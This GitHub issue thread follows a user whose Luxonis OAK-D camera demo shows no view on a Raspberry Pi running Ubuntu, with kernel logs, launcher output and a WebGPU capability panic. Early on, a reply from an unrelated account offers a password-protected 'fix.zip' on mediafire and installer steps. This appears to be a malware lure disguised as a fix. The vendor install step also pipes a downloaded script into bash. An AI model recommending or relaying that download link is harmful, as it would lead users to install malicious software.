luxonis/depthai #1199: Demo app running, no camera view

Jai-GAY, 2024-08-28:
is there any restriction in running? direct monitor connection?, no VNV?
Is there another way to verify the camera device connection? [Luxonis OAK-D Pro Fixed Focus.](https://shop.luxonis.com/products/oak-d-pro)

```
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.4 LTS
Release:        22.04
Codename:       jammy

sudo wget -qO- https://docs.luxonis.com/install_depthai.sh | bash

Press ENTER KEY to finish and run the demo app...
STARTING DEMO APP.
On branch main
Your branch is up to date with 'origin/main'.
```
[image]

cnhbliyou, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Jai-GAY, 2024-08-28:
> (you could run `sudo dmesg -w` in another terminal in parallel to see if messages get logged while starting the demo).

```
[    2.631653] usb 1-1.1: new high-speed USB device number 3 using xhci_hcd
[    2.732661] usb 1-1.1: New USB device found, idVendor=03e7, idProduct=2485, bcdDevice= 0.01
[    2.732684] usb 1-1.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[    2.732701] usb 1-1.1: Product: Movidius MyriadX
[    2.732715] usb 1-1.1: Manufacturer: Movidius Ltd.
[    2.732728] usb 1-1.1: SerialNumber: 03e72485
[    2.815682] usb 1-1.2: new low-speed USB device number 4 using xhci_hcd
[    2.923731] usb 1-1.2: New USB device found, idVendor=046d, idProduct=c018, bcdDevice=43.01
[    2.923754] usb 1-1.2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[    2.923769] usb 1-1.2: Product: USB Optical Mouse
[    2.923783] usb 1-1.2: Manufacturer: Logitech

[   37.453481] uart-pl011 fe201800.serial: no DMA platform data
[   43.385519] rfkill: input handler disabled
[  561.734554] usb 1-1.1: USB disconnect, device number 3
[  562.591920] usb 2-1: new SuperSpeed USB device number 2 using xhci_hcd
[  562.613141] usb 2-1: New USB device found, idVendor=03e7, idProduct=f63b, bcdDevice= 1.00
[  562.613163] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  562.613170] usb 2-1: Product: Luxonis Device
[  562.613176] usb 2-1: Manufacturer: Intel Corporation
[  562.613181] usb 2-1: SerialNumber: 184430109115B00E00
[  565.287635] usb 1-1.1: new high-speed USB device number 5 using xhci_hcd
[  565.388502] usb 1-1.1: New USB device found, idVendor=03e7, idProduct=2485, bcdDevice= 0.01
[  565.388532] usb 1-1.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  565.388544] usb 1-1.1: Product: Movidius MyriadX
[  565.388553] usb 1-1.1: Manufacturer: Movidius Ltd.
[  565.388562] usb 1-1.1: SerialNumber: 03e72485
[  565.423822] usb 2-1: USB disconnect, device number 2
[  566.855259] usb 1-1.1: USB disconnect, device number 5
[  567.595909] usb 2-1: new SuperSpeed USB device number 3 using xhci_hcd
[  567.617045] usb 2-1: New USB device found, idVendor=03e7, idProduct=f63b, bcdDevice= 1.00
[  567.617065] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  567.617072] usb 2-1: Product: Luxonis Device
[  567.617078] usb 2-1: Manufacturer: Intel Corporation
[  567.617083] usb 2-1: SerialNumber: 184430109115B00E00
[  570.915597] usb 1-1.1: new high-speed USB device number 6 using xhci_hcd
[  571.024260] usb 1-1.1: New USB device found, idVendor=03e7, idProduct=2485, bcdDevice= 0.01
[  571.024285] usb 1-1.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  571.024306] usb 1-1.1: Product: Movidius MyriadX
[  571.024312] usb 1-1.1: Manufacturer: Movidius Ltd.
[  571.024318] usb 1-1.1: SerialNumber: 03e72485
[  571.155774] usb 2-1: USB disconnect, device number 3
[  573.768184] usb 1-1.1: USB disconnect, device number 6
[  574.551927] usb 2-1: new SuperSpeed USB device number 4 using xhci_hcd
[  574.573123] usb 2-1: New USB device found, idVendor=03e7, idProduct=f63b, bcdDevice= 1.00
[  574.573144] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  574.573151] usb 2-1: Product: Luxonis Device
[  574.573157] usb 2-1: Manufacturer: Intel Corporation
[  574.573162] usb 2-1: SerialNumber: 184430109115B00E00
```

> Is your used in the `video` group?

```
$ groups
pi adm dialout cdrom sudo dip video plugdev lpadmin lxd sambashare
```

> Do you see a normal USB web cam working?

[this works](https://docs.luxonis.com/hardware/platform/deploy/to-rpi/#SSH%20into%20the%20RPi), after missing libraries installed.
```
python depthai-python/examples/MobileNet/rgb_mobilenet.py
```

Jai-GAY, 2024-08-29:
> maybe the camera needs more energy?
> Is there something written on the console when you start the demo?

on separate power sources. today, repeat the same step, no GUI window launched.
```
:::::::::::::::: INSTALATION COMPLETE ::::::::::::::::

To run demo app write <depthai_launcher> in terminal.
Press ENTER KEY to finish and run the demo app...
STARTING DEMO APP.
Warning: Ignoring XDG_SESSION_TYPE=wayland on Gnome. Use QT_QPA_PLATFORM=wayland to run on Wayland anyway.
On branch main
Your branch is up to date with 'origin/main'.

nothing to commit, working tree clean
========= Starting: Launcher (2024-08-29 10:29:46.668936) =========
System information:
 - sys.prefix = /home/pi/Luxonis/venv
 - sys.base_prefix = /usr
 - Env 'PYTHONPATH': /home/pi/ros2_ws/install/turtlesim/local/lib/python3.10/dist-packages:/home/pi/ros2_ws/install/ardupilot_dds_tests/lib/python3.10/site-packages:/home/pi/ros2_ws/install/ardupilot_sitl/local/lib/python3.10/dist-packages:/home/pi/ros2_ws/install/ardupilot_msgs/local/lib/python3.10/dist-packages:/opt/ros/humble/lib/python3.10/site-packages:/opt/ros/humble/local/lib/python3.10/dist-packages
 - Executable: /home/pi/Luxonis/venv/bin/python

Current commit: 6901f74579d2afe5b2dec31b32213a1af9bd38da
Current tag: None
Available DepthAI versions: ['v0.3.0.0', 'v0.4.0.0', 'v0.4.1.1', 'v1.0.0', 'v1.0.0.0', 'v2.0.0', 'v2.10.0.0', 'v2.7.2.0', 'v2.8.0.0', 'v2.9.0.0', 'v3.0.0', 'v3.0.1', 'v3.0.10', 'v3.0.11', 'v3.0.12', 'v3.0.12', 'v3.0.2', 'v3.0.3', 'v3.0.4', 'v3.0.5', 'v3.0.6', 'v3.0.7', 'v3.0.7', 'v3.0.8', 'v3.0.9', 'v3.1.0', 'v3.1.0', 'v3.1.1', 'v3.1.1', 'v3.1.2', 'v3.1.2', 'v3.1.3', 'v3.1.3', 'v3.2.0', 'v3.2.1', 'v3.3.0', 'v3.3.0', 'v3.3.1', 'v3.3.1', 'v3.4.0', 'v3.5.0', 'v3.5.0', 'v3.6.0', 'v3.6.0', 'v3.6.1']
Message Box (Update Available): Version 3.6.1 is available.
Current version is Unknown
Update?
Should update? True
Updated, running new launcher - command: ['/home/pi/Luxonis/venv/bin/python', '/home/pi/Luxonis/depthai/launcher/launcher.py', '-r', '/home/pi/Luxonis/depthai']
Unknown error occured (Shutting down and starting updated launcher), exiting...
Warning: Ignoring XDG_SESSION_TYPE=wayland on Gnome. Use QT_QPA_PLATFORM=wayland to run on Wayland anyway.
HEAD detached at v3.6.1
nothing to commit, working tree clean
[2024-08-29T02:30:16Z WARN  wgpu_core::instance] Missing downlevel flags: DownlevelFlags(FULL_DRAW_INDEX_UINT32)
    The underlying API or device in use does not support enough features to be a fully compliant implementation of WebGPU. A subset of the features can still be used. If you are running this program on native and not in a browser and wish to limit the features you use to the supported subset, call Adapter::downlevel_properties or Device::downlevel_properties to get a listing of the features the current platform supports.

thread 'ThreadId(1)' panicked at 'The given device doesn't support the required downlevel capabilities for the given hardware tier FullWebGpuSupport.
            Required:
            DownlevelCapabilities { flags: DownlevelFlags(COMPUTE_SHADERS | FRAGMENT_WRITABLE_STORAGE | INDIRECT_EXECUTION | BASE_VERTEX | READ_ONLY_DEPTH_STENCIL | NON_POWER_OF_TWO_MIPMAPPED_TEXTURES | CUBE_ARRAY_TEXTURES | COMPARISON_SAMPLERS | INDEPENDENT_BLEND | VERTEX_STORAGE | ANISOTROPIC_FILTERING | FRAGMENT_STORAGE | MULTISAMPLED_SHADING | DEPTH_TEXTURE_AND_BUFFER_COPIES | WEBGPU_TEXTURE_FORMAT_SUPPORT | BUFFER_BINDINGS_NOT_16_BYTE_ALIGNED | UNRESTRICTED_INDEX_BUFFER | FULL_DRAW_INDEX_UINT32 | DEPTH_BIAS_CLAMP | VIEW_FORMATS | UNRESTRICTED_EXTERNAL_TEXTURE_COPIES | SURFACE_VIEW_FORMATS), limits: DownlevelLimits, shader_model: Sm4 }
            Actual:
            DownlevelCapabilities { flags: DownlevelFlags(COMPUTE_SHADERS | FRAGMENT_WRITABLE_STORAGE | INDIRECT_EXECUTION | BASE_VERTEX | READ_ONLY_DEPTH_STENCIL | NON_POWER_OF_TWO_MIPMAPPED_TEXTURES | CUBE_ARRAY_TEXTURES | COMPARISON_SAMPLERS | INDEPENDENT_BLEND | VERTEX_STORAGE | ANISOTROPIC_FILTERING | FRAGMENT_STORAGE | MULTISAMPLED_SHADING | DEPTH_TEXTURE_AND_BUFFER_COPIES | WEBGPU_TEXTURE_FORMAT_SUPPORT | BUFFER_BINDINGS_NOT_16_BYTE_ALIGNED | UNRESTRICTED_INDEX_BUFFER | DEPTH_BIAS_CLAMP | VIEW_FORMATS | UNRESTRICTED_EXTERNAL_TEXTURE_COPIES | SURFACE_VIEW_FORMATS), limits: DownlevelLimits, shader_model: Sm5 }', re_renderer/src/context.rs:142

   6: core::panicking::panic_fmt
             at core/src/panicking.rs:72:14
   7: re_renderer::context::RenderContext::new
   8: core::ops::function::FnOnce::call_once{{vtable.shim}}
   9: <eframe::native::run::wgpu_integration::WgpuWinitApp as eframe::native::run::WinitApp>::on_event
  10: eframe::native::run::run_and_return::{{closure}}
  11: winit::platform_impl::platform::wayland::event_loop::EventLoop<T>::run_return
  12: eframe::native::run::with_event_loop
  13: eframe::run_native

Troubleshooting Rerun: https://www.rerun.io/docs/getting-started/troubleshooting
========= Starting: Launcher (2024-08-29 10:30:03.410383) =========
System information:
 - sys.prefix = /home/pi/Luxonis/venv
 - sys.base_prefix = /usr
 - Env 'PYTHONPATH': /home/pi/ros2_ws/install/turtlesim/local/lib/python3.10/dist-packages:/home/pi/ros2_ws/install/ardupilot_dds_tests/lib/python3.10/site-packages:/home/pi/ros2_ws/install/ardupilot_sitl/local/lib/python3.10/dist-packages:/home/pi/ros2_ws/install/ardupilot_msgs/local/lib/python3.10/dist-packages:/opt/ros/humble/lib/python3.10/site-packages:/opt/ros/humble/local/lib/python3.10/dist-packages
[... cut ...]
Available DepthAI versions: ['v0.3.0.0', 'v0.4.0.0', 'v0.4.1.1', 'v1.0.0', 'v1.0.0.0', 'v2.0.0', 'v2.10.0.0', 'v2.7.2.0', 'v2.8.0.0', 'v2.9.0.0', 'v3.0.0', 'v3.0.1', 'v3.0.10', 'v3.0.11', 'v3.0.12', 'v3.0.12', 'v3.0.2', 'v3.0.3', 'v3.0.4', 'v3.0.5', 'v3.0.6', 'v3.0.7', 'v3.0.7', 'v3.0.8', 'v3.0.9', 'v3.1.0', 'v3.1.0', 'v3.1.1', 'v3.1.1', 'v3.1.2', 'v3.1.2', 'v3.1.3', 'v3.1.3', 'v3.2.0', 'v3.2.1', 'v3.3.0', 'v3.3.0', 'v3.3.1', 'v3.3.1', 'v3.4.0', 'v3.5.0', 'v3.5.0', 'v3.6.0', 'v3.6.0', 'v3.6.1']
Current tag: v3.6.1, ver: 3.6.1
Launching DepthAI Viewer.
Installed DepthAI Viewer version: 0.2.4
Latest DepthAI Viewer version: 0.2.4
```

Jai-GAY, 2024-08-29:
I am running Ubuntu 22.04 on RPi 4B, RealVNC headless setup.
This was okay running above setup.
```
python depthai-python/examples/MobileNet/rgb_mobilenet.py
```

Jai-GAY, 2024-08-29:
> Have you tried setting the ENV variable like `export QT_QPA_PLATFORM=wayland` before starting the demo?

I will try next week, thank you for all the replies.

Jai-GAY, 2024-09-02:
> Have you tried setting the ENV variable like `export QT_QPA_PLATFORM=wayland` before starting the demo?

I tried to export, but when checking with the printenv command or export | grep QT_QPA_PLATFORM, shows nothing.
The demo run result is the same.
```
export QT_QPA_PLATFORM=wayland
QT_QPA_PLATFORM
```